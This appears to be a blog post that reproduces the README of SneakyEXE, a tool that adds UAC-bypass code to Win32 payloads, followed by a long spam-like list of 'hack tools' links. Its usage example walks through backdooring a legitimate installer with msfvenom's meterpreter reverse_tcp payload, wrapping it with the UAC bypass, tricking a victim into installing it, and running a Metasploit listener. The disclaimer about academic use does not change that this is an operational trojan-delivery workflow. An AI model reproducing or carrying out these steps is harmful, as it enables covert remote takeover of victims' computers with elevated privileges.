• Browse by Tags

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Continue reading


  1. Pentest Tools Windows
  2. How To Hack
  3. Nsa Hacker Tools
  4. Beginner Hacker Tools
  5. Hacker Tools
  6. Hacker Tools Online
  7. Hack Tools
  8. How To Hack
  9. Hacking Tools 2019
  10. Hacker Tools For Ios
  11. Pentest Tools Framework
  12. Hacking Tools Online
  13. Pentest Tools Linux
  14. Hack Tool Apk No Root
  15. Hacker Hardware Tools
  16. Hacking Tools
  17. Hack Tool Apk
  18. Hack Tools For Mac
  19. Hackers Toolbox
  20. Easy Hack Tools
  21. Free Pentest Tools For Windows
  22. Pentest Box Tools Download
  23. Hacker Tools Free
  24. Hack Tools Download
  25. Pentest Tools Bluekeep
  26. Hacker
  27. Hacker Tools For Ios
  28. Hack Tools For Pc
  29. Pentest Tools Download
  30. Pentest Tools Review
  31. Pentest Tools Free
  32. Physical Pentest Tools
  33. How To Make Hacking Tools
  34. Hacker Tools For Mac
  35. Hack Tools For Ubuntu
  36. Wifi Hacker Tools For Windows
  37. Hack Tools Download
  38. Pentest Tools Find Subdomains
  39. Hacking Tools And Software
  40. What Is Hacking Tools
  41. Hacker Tools Windows
  42. Hack Tools For Pc
  43. Hacking Tools Name
  44. World No 1 Hacker Software
  45. World No 1 Hacker Software
  46. Kik Hack Tools
  47. Hacking Tools Hardware
  48. Kik Hack Tools
  49. Hacking Tools Windows 10
  50. New Hacker Tools
  51. Pentest Tools For Android
  52. Pentest Reporting Tools
  53. Hacks And Tools
  54. Hacker Tools Windows
  55. Ethical Hacker Tools
  56. Kik Hack Tools
  57. Pentest Tools Bluekeep
  58. Android Hack Tools Github
  59. Pentest Tools Review
  60. Hack Tools 2019
  61. Hacking Tools
  62. Pentest Tools Nmap
  63. Hack Tools
  64. Pentest Tools Alternative
  65. Hack Tools Github
  66. Easy Hack Tools
  67. Hack Tools Online
  68. Hack Tool Apk
  69. Hacking Tools For Windows
  70. Hack Website Online Tool
  71. Hacker Tools Software
  72. Hacker Tools For Windows
  73. Pentest Tools Download
  74. Hack Tools Online
  75. Hacker Tools Linux
  76. Pentest Tools For Mac
  77. Hack Apps
  78. Hacking App
  79. Hack Tools
  80. Pentest Tools Find Subdomains
  81. Hacking Tools For Mac
  82. Pentest Tools Port Scanner
  83. Kik Hack Tools
  84. Hack Tools For Ubuntu
  85. Computer Hacker
  86. Tools Used For Hacking
  87. Hacker Tools For Mac
  88. Physical Pentest Tools
  89. Hacking Tools And Software
  90. Pentest Tools For Windows

0 comments on "SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload"



Post a Comment